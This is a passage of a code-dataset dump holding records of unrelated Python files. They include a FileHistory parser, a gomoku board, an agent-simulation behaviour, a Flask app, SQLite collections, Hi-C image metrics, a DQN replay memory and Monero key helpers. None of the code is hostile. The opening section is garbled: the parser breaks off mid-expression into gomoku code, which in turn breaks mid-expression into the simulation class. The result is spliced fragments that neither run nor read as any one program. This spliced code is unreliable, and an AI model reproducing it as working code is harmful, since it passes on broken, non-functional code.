'filehistory_config'\r\n DESCRIPTION = 'Parser for Windows filehistory Config.xml files.'\r\n\r\n _HEADER_READ_SIZE = 128\r\n\r\n def ParseFileObject(self, parser_mediator, file_object):\r\n \"\"\"Parses an Windows FileHistory Config file-like object.\r\n\r\n Args:\r\n parser_mediator (ParserMediator): mediates interactions between parsers\r\n and other components, such as storage and dfvfs.\r\n file_object (dfvfs.FileIO): file-like object.\r\n\r\n Raises:\r\n unableToParseFile: when the file cannot be parsed.\r\n \"\"\"\r\n data = file_object.read(self._HEADER_READ_SIZE)\r\n if not data.startswith(b'self.n-1) or (t_y < 0 or t_y >self.n-1):\n break\n\n print(t_x,t_y)\n if self[t_y][t_x] == color:\n count += 1\n else:\n break\n if count >= 5:\n return True\n count = 0\n return False\n\n def get_legal_moves(self):\n \"\"\"Returns all the legal moves where no dol is on\n (1 for white, -1 for black\n \"\"\"\n moves = set() # stores the legal moves.\n newmoves = []\n # Get all the squares with pieces of the given color.\n for x in range(self.n):\n for y in range(self.n):\n if self[x][y]==0:\n newmoves.append((x,y))\n \n moves.update(newmoves)\n return list(moves)\n\n def get_legal_movesBoard(self):\n # return list\n legalBoard = [None]*self.n\n for i in range(self.n):\n legalBoard[i] = [0]*self.n\n for y in range(self.n):\n for x in range(self.n):\n if self.pieces[y][x] == 0:\n legalBoard[y][x] = 1\n else:\n legalBoard[y][x] = 0\n\n legalBoard[self.n/2][self.n/2] = 0\n return legalBoard\n\n\n def execute_move(self, move, color):\n \"\"\"Perform the given move on the board; put player's color dol \n on the move (1=white,-1=black)\n \"\"\"\n self.convert_to_Board_Pos(move,color)\n \n def convert_to_Board_Pos(self,move,color):\n bum =((self.n*self.n)*(self.n*self.n-1))/2\n allCases = [0]*bum\n allCases[move] = color\n \n self.sub_convert_to_Board(allCases[move],move,self.pieces)\n \n\n\n def convert_to_Board(self,allCases):\n \"\"\"\n convert a allCases array in to board form list\n \"\"\"\n board = [None]*self.n\n for i in range(self.n):\n board[i] = [0]*self.n\n\n caseNum = ((self.n*self.n)*(self.n*self.n-1))/2\n \n\n for c in range(caseNum):\n if allCases[c] != 0:\n self.sub_convert_to_Board(allCases[c],c,board)\n\n board[self.n/2][self.n/2] = 0 #9,9 black initial dol\n return board\n\n def sub_convert_to_Board(self,player,c,board):\n\n boardSize = self.n**2-1\n count = 0\n accum = 0\n for j in range(boardSize-count,0,-1):\n count+=1 \n accum += j\n if c < accum:\n #first digit can be defined\n # print(\"wow\")\n count-=1\n accum-=1\n board[count/self.n][count%self.n] = player\n accum = boardSize+1-accum+c\n count = 0\n\n for y in range(self.n):\n for x in range(self.n):\n count+=1\n if count == accum:\n board[y][x] = player\n return \n\n\n\n @staticmethod\n def _increment_move(move, direction, n): \n # print(move)\n \"\"\" Generator expression for incrementing moves \"\"\"\n move = list(map(sum, zip(move, direction)))\n #move = (move[0]+direction[0], move[1]+direction[1])\n while all(map(lambda x: 0 <= x < n, move)): \n #while 0<=move[0] and move[0] None:\n \"\"\"\n Implement the setup.\n :return: None\n \"\"\"\n self._replay_logger = ReplayLogger()\n\n environment = self.context.environment\n mapping = AddressMapping(\n self._mapping_path,\n environment.nb_agents\n )\n mapping.load()\n environment.set_mapping(mapping)\n\n def act(self) -> None:\n \"\"\"\n Implement the act. Actions depending on the phase of the simulation\n (can add a time constraint).\n\n :return: None\n \"\"\"\n environment = cast(Environment, self.context.environment)\n\n if environment.phase.value == Phase.START_SIMULATION.value:\n # Set up simulation logging\n self._replay_logger.initialize(environment.state)\n # Log initial state\n self._replay_logger.log_state(environment.state)\n environment.phase = Phase.START_NEXT_SIMULATION_TURN\n\n elif environment.phase.value == Phase.START_NEXT_SIMULATION_TURN.value:\n self._send_tick_messages(environment)\n self.context.logger.info(\"tick messages sent, waiting for replies\")\n environment.phase = Phase.COLLECTING_AGENTS_REPLY\n\n elif environment.phase.value == Phase.COLLECTING_AGENTS_REPLY.value:\n if environment.agents_reply_received:\n environment.phase = Phase.AGENTS_REPLY_RECEIVED\n\n environment.phase = Phase.START_NEXT_SIMULATION_TURN\n environment.update_simulation()\n self._replay_logger.log_state(environment.state)\n if len(environment.agents_alive) == 0 or environment.turn_number > self._max_turns:\n environment.phase = Phase.SIMULATION_CANCELLED\n else:\n environment.phase = Phase.START_NEXT_SIMULATION_TURN\n\n elif environment.phase.value == Phase.SIMULATION_CANCELLED.value:\n # the simulation has been canceled\n environment.end_simulation()\n self._cancel_simulation(environment)\n return None\n else:\n return None\n\n def teardown(self) -> None:\n \"\"\"\n Implement the task teardown.\n\n :return: None\n \"\"\"\n self._replay_logger.close()\n\n def _cancel_simulation(self, environment: Environment) -> None:\n if self.context.is_active:\n self.context.is_active = False\n Path(\"$SIMULATION_ENDED\").touch()\n\n def _send_tick_messages(self, environment: Environment) -> None:\n \"\"\"Collects data from the env and sends tick messages to all agents alive for current turn of simulation.\"\"\"\n if environment.agents_alive != [None]:\n self._send_to_all_agents(environment)\n else:\n self.context.logger.info(\n \"Tick messages not sent, list of agents alive is: '{}'\".format(environment.agents_alive))\n\n def _send_to_all_agents(self, environment):\n turn_number = environment.turn_number\n self.context.logger.info(\"Sending tick messages for turn number: '{}'\".format(turn_number))\n agent_environment_dialogues = cast(AgentEnvironmentDialogues, self.context.agent_environment_dialogues)\n\n for agent_address in environment.agents_alive:\n tile_water = environment.water_content(agent_address)\n agent_water = environment.agent_water(agent_address)\n n, e, s, w = environment.neighbours_nesw(agent_address)\n agent_movement = environment.agent_movement(agent_address)\n\n tick_msg, _agent_environment_dialogue = agent_environment_dialogues.create(\n counterparty=agent_address,\n performative=AgentEnvironmentMessage.Performative.TICK,\n tile_water=tile_water,\n turn_number=turn_number,\n agent_water=agent_water,\n north_neighbour_id=n if n else \"None\",\n east_neighbour_id=e if e else \"None\",\n south_neighbour_id=s if s else \"None\",\n west_neighbour_id=w if w else \"None\",\n movement_last_turn=agent_movement if agent_movement else \"None\"\n )\n self.context.outbox.put_message(message=tick_msg)\n","sub_path":"env_aea/skills/env_action_each_turn/behaviours.py","file_name":"behaviours.py","file_ext":"py","file_size_in_byte":6217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"172808122","text":"from flask import Flask, render_template, request\nfrom main import SentimentAnalysis\nfrom form import getData\nimport os\n\napp = Flask(__name__)\nSECRET_KEY = os.urandom(32)\napp.config['SECRET_KEY'] = SECRET_KEY\nsa=SentimentAnalysis()\n\n@app.route('/')\ndef index():\n form=getData()\n return render_template('m.html',form=form)\n\n@app.route('/submit', methods = ['GET', 'POST'])\ndef submit():\n if request.method == 'POST':\n #Parse form data \n getData.topic = request.form['topic']\n getData.count = request.form['count']\n sa.DownloadData()\n return render_template('m.html')\n\nif __name__ == \"__main__\":\n app.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"113656278","text":"from PIL import Image\nimport numpy as np\nimport sys\nimport os\nimport csv\nimport random\n\nlabels = {}\ncount = 0\noutput = [\"train.csv\", \"test.csv\"]\nfor root, dirs, files in os.walk(\"pic\", topdown=False):\n labels[root] = count\n \n for name in files:\n if(name.endswith('.jpg')):\n fileName = os.path.join(root, name)\n else:\n continue\n img_file = Image.open(fileName)\n\n width, height = img_file.size\n format = img_file.format\n mode = img_file.mode\n\n img_grey = img_file.convert('L')\n\n value = np.asarray(img_grey.getdata(), dtype=np.int).reshape((img_grey.size[1], img_grey.size[0]))\n value = value.flatten()\n value = np.insert(value, 0, count)\n with open(random.choice(output), 'a') as f:\n writer = csv.writer(f)\n writer.writerow(value)\n\n count += 1\n\nprint (labels)","sub_path":"transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"267534045","text":"import sqlite3\nfrom abc import ABCMeta, abstractmethod\nfrom enum import Enum\nfrom pickle import dumps, loads\nfrom tempfile import NamedTemporaryFile\nfrom typing import Callable, Generic, Optional, TypeVar, Union, cast\nfrom uuid import uuid4\n\nT = TypeVar(\"T\")\nKT = TypeVar(\"KT\")\nVT = TypeVar(\"VT\")\n_T = TypeVar(\"_T\")\n_S = TypeVar(\"_S\")\n\n\nclass RebuildStrategy(Enum):\n CHECK_WITH_FIRST_ELEMENT = 1\n ALWAYS = 2\n SKIP = 3\n\n\nclass SqliteCollectionBase(Generic[T], metaclass=ABCMeta):\n def __init__(\n self,\n connection: Optional[Union[str, sqlite3.Connection]] = None,\n table_name: Optional[str] = None,\n serializer: Optional[Callable[[T], bytes]] = None,\n deserializer: Optional[Callable[[bytes], T]] = None,\n persist: bool = True,\n rebuild_strategy: RebuildStrategy = RebuildStrategy.CHECK_WITH_FIRST_ELEMENT,\n do_initialize: bool = True,\n ):\n super(SqliteCollectionBase, self).__init__()\n self._serializer = cast(Callable[[T], bytes], dumps) if serializer is None else serializer\n self._deserializer = cast(Callable[[bytes], T], loads) if deserializer is None else deserializer\n self._persist = persist\n self._rebuild_strategy = rebuild_strategy\n if connection is None:\n self._connection = sqlite3.connect(NamedTemporaryFile().name)\n elif isinstance(connection, str):\n self._connection = sqlite3.connect(connection)\n elif isinstance(connection, sqlite3.Connection):\n self._connection = connection\n else:\n raise TypeError(\n f\"connection argument must be None or a string or a sqlite3.Connection, not '{type(connection)}'\"\n )\n self._table_name = (\n f\"{self.container_type_name}_{str(uuid4()).replace('-', '')}\" if table_name is None else table_name\n )\n if do_initialize:\n self._initialize(commit=True)\n\n def __del__(self) -> None:\n if not self.persist:\n cur = self.connection.cursor()\n cur.execute(\n \"DELETE FROM metadata WHERE table_name=? AND container_type=?\",\n (self.table_name, self.container_type_name),\n )\n cur.execute(f\"DROP TABLE {self.table_name}\")\n self.connection.commit()\n\n def _initialize(self, commit: bool = False) -> None:\n self._initialize_metadata_table(commit=commit)\n self._initialize_table(commit=commit)\n if self._should_rebuild():\n self._do_rebuild(commit=commit)\n\n def _should_rebuild(self) -> bool:\n if self.rebuild_strategy == RebuildStrategy.ALWAYS:\n return True\n if self.rebuild_strategy == RebuildStrategy.SKIP:\n return False\n return self._rebuild_check_with_first_element()\n\n @abstractmethod\n def _rebuild_check_with_first_element(self) -> bool:\n ...\n\n @abstractmethod\n def _do_rebuild(self, commit: bool = False) -> None:\n ...\n\n @property\n def rebuild_strategy(self) -> RebuildStrategy:\n return self._rebuild_strategy\n\n @property\n def persist(self) -> bool:\n return self._persist\n\n @property\n def serializer(self) -> Callable[[T], bytes]:\n return self._serializer\n\n def serialize(self, x: T) -> bytes:\n return self.serializer(x)\n\n @property\n def deserializer(self) -> Callable[[bytes], T]:\n return self._deserializer\n\n def deserialize(self, blob: bytes) -> T:\n return self.deserializer(blob)\n\n @property\n def table_name(self) -> str:\n return \"\".join(c for c in self._table_name if c.isalnum() or c == \"_\")\n\n @property\n def connection(self) -> sqlite3.Connection:\n return self._connection\n\n @property\n def container_type_name(self) -> str:\n return self.__class__.__name__\n\n @property\n @abstractmethod\n def schema_version(self) -> str:\n ...\n\n def _is_table_initialized(self) -> bool:\n try:\n cur = self._connection.cursor()\n cur.execute(\n \"SELECT schema_version FROM metadata WHERE table_name=? AND container_type=?\",\n (self.table_name, self.container_type_name),\n )\n buf = cur.fetchone()\n if buf is None:\n return False\n version = buf[0]\n if version != self.schema_version:\n return False\n cur.execute(f\"SELECT 1 FROM {self.table_name}\")\n return True\n except sqlite3.OperationalError as _:\n pass\n return False\n\n def _do_tidy_table_metadata(self, commit: bool = False) -> None:\n cur = self.connection.cursor()\n cur.execute(\n \"INSERT INTO metadata (table_name, schema_version, container_type) VALUES (?, ?, ?)\",\n (self.table_name, self.schema_version, self.container_type_name),\n )\n if commit:\n self.connection.commit()\n\n def _initialize_table(self, commit: bool = False) -> None:\n if not self._is_table_initialized():\n self._do_create_table()\n self._do_tidy_table_metadata()\n if commit:\n self.connection.commit()\n\n @abstractmethod\n def _do_create_table(self, commit: bool = False) -> None:\n ...\n\n def _is_metadata_table_initialized(self) -> bool:\n try:\n cur = self.connection.cursor()\n cur.execute(\"SELECT 1 FROM metadata\")\n return True\n except sqlite3.OperationalError as _:\n pass\n return False\n\n def _do_initialize_metadata_table(self, commit: bool = False) -> None:\n cur = self.connection.cursor()\n cur.execute(\n \"\"\"\n CREATE TABLE metadata (\n table_name TEXT PRIMARY KEY,\n schema_version TEXT NOT NULL,\n container_type TEXT NOT NULL,\n UNIQUE (table_name, container_type)\n )\n \"\"\"\n )\n if commit:\n self.connection.commit()\n\n def _initialize_metadata_table(self, commit: bool = False) -> None:\n if not self._is_metadata_table_initialized():\n self._do_initialize_metadata_table(commit)\n","sub_path":"sqlitecollections/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":6234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"363055493","text":"#the implementation of SSIM in this file is pulled from DeepHiC https://github.com/omegahh/DeepHiC\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom math import exp\nimport numpy as np\nfrom Models.VEHiCLE_Module import GAN_Model\nfrom scipy.stats import pearsonr\nfrom scipy.stats import spearmanr\nimport argparse\nimport sys\nsys.path.append(\".\")\nsys.path.append(\"../\")\nimport numpy as np\nfrom sklearn.decomposition import PCA\nimport glob\nimport yaml\nimport matplotlib.pyplot as plt\nimport torch\nimport pdb\nfrom pytorch_lightning import Trainer\nfrom Data.GM12878_DataModule import GM12878Module\nfrom Data.K562_DataModule import K562Module\n\nclass SSIM(nn.Module):\n def __init__(self, window_size=11, size_average=True):\n super(SSIM, self).__init__()\n self.window_size = window_size\n self.size_average = size_average\n self.channel = 1\n self.window = self.create_window(window_size, self.channel)\n\n def _toimg(self, mat):\n m = torch.tensor(mat)\n # convert to float and add channel dimension\n return m.float().unsqueeze(0)\n\n def _tohic(self, mat):\n mat.squeeze_()\n return mat.numpy()#.astype(int)\n\n def gaussian(self, width, sigma):\n gauss = torch.Tensor([exp(-(x-width//2)**2 / float(2 * sigma**2)) for x in range(width)])\n return gauss / gauss.sum()\n\n def create_window(self, window_size, channel, sigma=3):\n _1D_window = self.gaussian(window_size, sigma).unsqueeze(1)\n _2D_window = _1D_window.mm(_1D_window.t()).float().unsqueeze(0).unsqueeze(0)\n window = _2D_window.expand(channel, 1, window_size, window_size).contiguous()\n return window\n\n def gaussian_filter(self, img, width, sigma=3):\n img = _toimg(img).unsqueeze(0)\n _, channel, _, _ = img.size()\n window = self.create_window(width, channel, sigma)\n mu1 = F.conv2d(img, window, padding=width // 2, groups=channel)\n return _tohic(mu1)\n\n def _ssim(self, img1, img2, window, window_size, channel, size_average=True):\n mu1 = F.conv2d(img1, window, padding=window_size // 2, groups=channel)\n mu2 = F.conv2d(img2, window, padding=window_size // 2, groups=channel)\n\n mu1_sq = mu1.pow(2)\n mu2_sq = mu2.pow(2)\n mu1_mu2 = mu1 * mu2\n\n sigma1_sq = F.conv2d(img1 * img1, window, padding=window_size // 2, groups=channel) - mu1_sq\n sigma2_sq = F.conv2d(img2 * img2, window, padding=window_size // 2, groups=channel) - mu2_sq\n sigma12 = F.conv2d(img1 * img2, window, padding=window_size // 2, groups=channel) - mu1_mu2\n\n C1 = 0.01 ** 2\n C2 = 0.03 ** 2\n\n ssim_map = ((2 * mu1_mu2 + C1) * (2 * sigma12 + C2)) / ((mu1_sq + mu2_sq + C1) * (sigma1_sq + sigma2_sq + C2))\n\n if size_average:\n return ssim_map.mean()\n else:\n return ssim_map.mean(1).mean(1).mean(1)\n\n\n def ssim(self, img1, img2, window_size=11, size_average=True):\n img1 = _toimg(img1).unsqueeze(0)\n img2 = _toimg(img2).unsqueeze(0)\n _, channel, _, _ = img1.size()\n window = self.create_window(window_size, channel)\n window = window.type_as(img1)\n\n return self._ssim(img1, img2, window, window_size, channel, size_average)\n\n\n\n def forward(self, img1, img2):\n (_, channel, _, _) = img1.size()\n\n if channel == self.channel and self.window.data.type() == img1.data.type():\n window = self.window\n else:\n window = self.create_window(self.window_size, channel)\n\n if img1.is_cuda:\n window = window.cuda(img1.get_device())\n window = window.type_as(img1)\n\n self.window = window\n self.channel = channel\n\n return self._ssim(img1, img2, window, self.window_size, channel, self.size_average)\n\n\n\nclass VisionMetrics:\n def __init__(self):\n self.ssim = SSIM()\n self.metric_logs = {\n \"pre_pcc\":[],\n \"pas_pcc\":[],\n \"pre_spc\":[],\n \"pas_spc\":[],\n \"pre_psnr\":[],\n \"pas_psnr\":[],\n \"pre_ssim\":[],\n \"pas_ssim\":[],\n \"pre_mse\":[],\n \"pas_mse\":[],\n \"pre_snr\":[],\n \"pas_snr\":[]\n }\n\n\n def _logSSIM(self, data, target, output):\n self.metric_logs['pre_ssim'].append(self.compareSSIM(data, target))\n self.metric_logs['pas_ssim'].append(self.compareSSIM(output, target))\n\n def _logPSNR(self, data, target, output):\n self.metric_logs['pre_psnr'].append(self.comparePSNR(data, target))\n self.metric_logs['pas_psnr'].append(self.comparePSNR(output, target))\n\n def _logPCC(self, data, target, output):\n self.metric_logs['pre_pcc'].append(self.comparePCC(data, target))\n self.metric_logs['pas_pcc'].append(self.comparePCC(output, target))\n\n def _logSPC(self, data, target, output):\n self.metric_logs['pre_spc'].append(self.compareSPC(data, target))\n self.metric_logs['pas_spc'].append(self.compareSPC(output, target))\n\n def _logMSE(self, data, target, output):\n self.metric_logs['pre_mse'].append(self.compareMSE(data, target))\n self.metric_logs['pas_mse'].append(self.compareMSE(output, target))\n\n def _logSNR(self, data, target, output):\n self.metric_logs['pre_snr'].append(self.compareSNR(data, target))\n self.metric_logs['pas_snr'].append(self.compareSNR(output, target))\n\n def compareSPC(self, a, b):\n return spearmanr(a[0][0], b[0][0], axis=None)[0]\n\n def comparePCC(self, a, b):\n return pearsonr(a[0][0].flatten(), b[0][0].flatten())[0]\n\n def comparePSNR(self, a, b):\n MSE = np.square(a[0][0]-b[0][0]).mean().item()\n MAX = torch.max(b).item()\n return 20*np.log10(MAX) - 10*np.log10(MSE)\n\n def compareSNR(self, a, b):\n return torch.sum(b[0][0]).item()/torch.sqrt(torch.sum((b[0][0]-a[0][0])**2)).item()\n\n def compareSSIM(self, a, b):\n return self.ssim(a, b).item()\n\n def compareMSE(self, a, b):\n return np.square(a[0][0]-b[0][0]).mean().item()\n\n def log_means(self, name):\n return (name, np.mean(self.metric_logs[name]))\n\n def setDataset(self, chro, res=10000, piece_size=269, cell_line=\"GM12878\"):\n if cell_line == \"GM12878\":\n self.dm_test = GM12878Module(batch_size=1, res=res, piece_size=piece_size)\n if cell_line == \"K562\":\n self.dm_test = K562Module(batch_size=1, res=res, piece_size=piece_size)\n self.dm_test.prepare_data()\n self.dm_test.setup(stage=chro)\n\n def getMetrics(self, model, spliter):\n self.metric_logs = {\n \"pre_pcc\":[],\n \"pas_pcc\":[],\n \"pre_spc\":[],\n \"pas_spc\":[],\n \"pre_psnr\":[],\n \"pas_psnr\":[],\n \"pre_ssim\":[],\n \"pas_ssim\":[],\n \"pre_mse\":[],\n \"pas_mse\":[],\n \"pre_snr\":[],\n \"pas_snr\":[]\n }\n\n for e, epoch in enumerate(self.dm_test.test_dataloader()):\n print(str(e)+\"/\"+str(self.dm_test.test_dataloader().dataset.data.shape[0]))\n data, full_target, info = epoch\n target = full_target[:,:,6:-6,6:-6]\n filter_data = data[:,:,6:-6,6:-6]\n if spliter == \"vehicle\" or spliter == \"large\": #no need to seperate pieces\n output = model(data).detach()\n\n if spliter == \"hicplus\" or spliter == \"hicsr\": #separater into 40x40 windows\n output = torch.zeros((1,1,269,269))\n for i in range(0, 269-40, 28):\n for j in range(0,269-40,28):\n temp = data[:,:,i:i+40, j:j+40]\n output[:,:,i+6:i+34, j+6:j+34] = model(temp)\n output = output[:,:,6:-6,6:-6].detach()\n \n if spliter == \"deephic\" or spliter=='vae':\n output = torch.zeros((1,1,269,269))\n for i in range(0, 269-40, 28):\n for j in range(0,269-40,28):\n temp = data[:,:,i:i+40, j:j+40]\n output[:,:,i+6:i+34, j+6:j+34] = model(temp)[:,:,6:-6,6:-6]\n output = output[:,:,6:-6,6:-6].detach()\n\n if spliter == \"large_deephic\":\n output = model(data).detach()[:,:,6:-6,6:-6]\n\n\n self._logPCC(data=filter_data, target=target, output=output)\n self._logSPC(data=filter_data, target=target, output=output)\n self._logMSE(data=filter_data, target=target, output=output)\n self._logPSNR(data=filter_data, target=target, output=output)\n self._logSNR(data=filter_data, target=target, output=output)\n self._logSSIM(data=filter_data, target=target, output=output)\n print(list(map(self.log_means, self.metric_logs.keys())))\n return self.metric_logs\n\nif __name__=='__main__':\n visionMetrics = VisionMetrics()\n visionMetrics.setDataset(20, cell_line=\"K562\")\n WEIGHT_PATH = \"deepchromap_weights.ckpt\"\n model = GAN_Model()\n pretrained_model = model.load_from_checkpoint(WEIGHT_PATH)\n pretrained_model.freeze()\n visionMetrics.getMetrics(model=pretrained_model, spliter=False)\n","sub_path":"Utils/vision_metrics.py","file_name":"vision_metrics.py","file_ext":"py","file_size_in_byte":9328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"85043590","text":"import random\nfrom collections import deque\nimport math\nfrom operator import itemgetter\nimport numpy as np\n\n\nclass Memory:\n '''\n Memory storage of observed states. This includes basic functionality\n to retrieve a sample from memory in a random fashion, as well as more\n advanced memory prioritisation techniques such as memory prioritisation.\n\n '''\n\n def __init__( self, hyper_params):\n self.hp = hyper_params\n\n self.memory_sort_interval=2000\n\n # when beta in mem prior should be at minimal value\n self.mem_prior_beta_anneal_max=200000\n\n self.memory = deque( )\n\n if self.hp.USE_MEM_PRIOR:\n self._init_rank_distributions( )\n\n def store( self, td_error, last_action, reward, st_0, st_1, term_state ):\n # store the transition in memory\n self.memory.append( [ td_error, st_0, last_action, reward, st_1, term_state ] )\n\n if len( self.memory ) > self.hp.MEM_SIZE:\n self.memory.popleft( )\n\n def get_sample( self, step ):\n if self.hp.USE_MEM_PRIOR:\n if step % self.memory_sort_interval == 0:\n self._sort_memory( )\n mini_batch, mini_batch_idx, wIs = self._get_rank_prioritisation_sample( step )\n else:\n wIs = None\n mini_batch, mini_batch_idx = self._get_random_sample( )\n return mini_batch, mini_batch_idx, wIs\n\n def update_td_errors( self, mini_batch_idx, td_error_batch, td_error_idx ):\n if self.hp.USE_MEM_PRIOR:\n # RANK BASED\n for cc in range( self.hp.BATCH_SIZE ):\n self.memory[ mini_batch_idx[ cc ] ][ td_error_idx ] = math.fabs( td_error_batch[ cc ] )\n\n def _init_rank_distributions( self ):\n # Cache partition indices for several values of N as alpha is static\n self.alpha = 0.7\n self.beta_zero = 0.5\n self.num_partitions = 100 # must be at least 1/100 of memory size\n self.partition_division = int( np.floor( float( self.hp.MEM_SIZE ) / self.num_partitions ) )\n self.distribution_list = [ ]\n\n for n in range( self.partition_division, self.hp.MEM_SIZE + self.partition_division, self.partition_division ):\n # Create power law PDF\n distribution_pdf = np.power( np.linspace( 1, n, n ), -self.alpha )\n pdf_sum = np.sum( distribution_pdf )\n distribution_pdf /= pdf_sum # Normalise PDF, so probability is 1.0\n # Create CDF\n cdf = np.cumsum( distribution_pdf )\n\n # Set up strata for stratified sampling (transitions will have varying TD-error magnitudes delta)\n distribution_strata_ends = np.zeros( self.hp.BATCH_SIZE + 1 )\n distribution_strata_ends[ 0 ] = 0 # First index is 0 (+1)\n distribution_strata_ends[ self.hp.BATCH_SIZE ] = n - 1 # Last index is n\n\n # Use linear search to find strata indices\n stratum_end = 1.0 / self.hp.BATCH_SIZE\n index = 0\n for s in range( 1, self.hp.BATCH_SIZE ):\n index += 1\n while cdf[ index ] < stratum_end:\n index += 1\n distribution_strata_ends[ s ] = index # Save index\n stratum_end += 1.0 / self.hp.BATCH_SIZE # Set condition for next stratum\n\n # Store distribution\n self.distribution_list.append( (distribution_pdf, distribution_strata_ends) )\n\n # Calculate beta growth factor (linearly annealed till end of training)\n self.beta_grad = (1.0 - self.beta_zero) / (self.mem_prior_beta_anneal_max - self.hp.OBSERVE)\n\n\n def _sort_memory( self ):\n # print \"SORTING\"\n # tic = time.time( )\n self.memory = deque( sorted( self.memory, key=itemgetter( 0 ), reverse=False ) )\n # print \"sort toc = \", time.time( ) - tic\n\n\n def _get_rank_prioritisation_sample( self, step ):\n # From Schaul et al. 2016\n\n curr_mem_length = self.memory.__len__( )\n # Find closest precomputed distribution by size\n distribution_idx = int( np.floor( float( curr_mem_length ) / self.hp.MEM_SIZE * self.num_partitions ) )\n distribution_idx = min( distribution_idx, self.distribution_list.__len__( ) )\n (distribution_pdf, distribution_strata_ends) = self.distribution_list[ distribution_idx - 1 ]\n N = distribution_idx * self.partition_division\n\n # Create table to store indices (by rank)\n # In reality the underlying array-based binary heap\n # is used as an approximation of a ranked (sorted) array\n rank_indices = [ ]\n indices = [ ]\n\n # Perform stratified sampling\n for n in range( self.hp.BATCH_SIZE ):\n x1 = distribution_strata_ends[ n ]\n x2 = distribution_strata_ends[ n + 1 ]\n # print \"x1=\",x1\n # print \"x2=\",x2\n rank_indices.append( random.sample( range( int( x1 ), int( x2 ) ), 1 )[ 0 ] )\n # print \"rankIndices = \",rankIndices[n]\n indices.append( curr_mem_length - rank_indices[ n ] - 1 )\n\n # update beta\n beta = min( self.beta_zero + (step - self.hp.OBSERVE) * self.beta_grad, 1 )\n\n # Compute importance-sampling weights w = (N * p(rank))^-beta\n w = np.power( distribution_pdf[ rank_indices ] * N, -beta )\n\n # Find max importance-sampling weight for normalisation\n w_max = np.max( w )\n\n # Normalise weights so updates only scale downwards (for stability)\n w /= w_max # Max weight will be 1\n\n # todo, don't know what to do with w yet\n # - i think the idea is to multiply the TD_error by this term at some point\n\n mini_batch = [ ]\n mini_batch_idx = [ ]\n for cc in range( self.hp.BATCH_SIZE ):\n mini_batch_idx.append( indices[ cc ] )\n mini_batch.append( self.memory[ indices[ cc ] ] )\n\n return mini_batch, mini_batch_idx, w\n\n\n\n def _get_random_sample( self ):\n mini_batch_idx = random.sample( range( min( self.hp.MEM_SIZE, self.memory.__len__( ) ) ), self.hp.BATCH_SIZE )\n mini_batch = [ self.memory[ idx ] for idx in mini_batch_idx ]\n return mini_batch, mini_batch_idx\n","sub_path":"ReinforcementLearning/DQN/Learners/Memory.py","file_name":"Memory.py","file_ext":"py","file_size_in_byte":6204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"620374090","text":"# https://www.leetfree.com/problems/meeting-rooms-ii.html#\nimport heapq\n\n\nclass Interval:\n def __init__(self, start, end):\n self.start, self.end = start, end\n\n\ndef min_meeting_rooms(intervals):\n if not intervals:\n return 0\n\n intervals.sort(key=lambda interval: interval.start)\n\n min_heap = [intervals[0].end]\n for interval in intervals[1:]:\n if interval.start >= min_heap[0]:\n heapq.heappushpop(min_heap, interval.end)\n else:\n heapq.heappush(min_heap, interval.end)\n\n return len(min_heap)\n\n\nif __name__ == '__main__':\n intervals = [Interval(0, 30), Interval(5, 10), Interval(15, 20), Interval(20, 30)]\n print(min_meeting_rooms(intervals))\n","sub_path":"Problems/leetcode/Meeting_Rooms_II_253.py","file_name":"Meeting_Rooms_II_253.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"190810625","text":"# Copyright (c) 2021 Emanuele Bellocchia\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n\n# Imports\nfrom __future__ import annotations\nfrom functools import lru_cache\nfrom typing import Optional, Union\nfrom bip_utils.addr import XmrAddr\nfrom bip_utils.ecc import Ed25519Monero, Ed25519MoneroPrivateKey, IPrivateKey, IPublicKey\nfrom bip_utils.monero.monero_ex import MoneroKeyError\nfrom bip_utils.monero.monero_keys import MoneroPrivateKey, MoneroPublicKey\nfrom bip_utils.utils import ConvUtils, CryptoUtils\n\n\nclass MoneroConst:\n \"\"\" Class container for Monero keys constants. \"\"\"\n\n # Address main net version\n ADDR_MAIN_NET_VER: bytes = b\"\\x12\"\n # Address checksum length in bytes\n ADDR_CHECKSUM_BYTE_LEN: int = 4\n\n # Subaddress main net version\n SUBADDR_MAIN_NET_VER: bytes = b\"\\x2a\"\n # Subaddress prefix\n SUBADDR_PREFIX: bytes = b\"SubAddr\\x00\"\n # Subaddress maximum index\n SUBADDR_MAX_IDX: int = 2**32 - 1\n # Subaddress index length in byte\n SUBADDR_IDX_BYTE_LEN: int = 4\n\n\nclass MoneroUtils:\n \"\"\" Class container for Monero utility functions. \"\"\"\n\n @staticmethod\n def ScReduce(data_bytes: bytes) -> bytes:\n \"\"\" Convert the specified bytes to integer 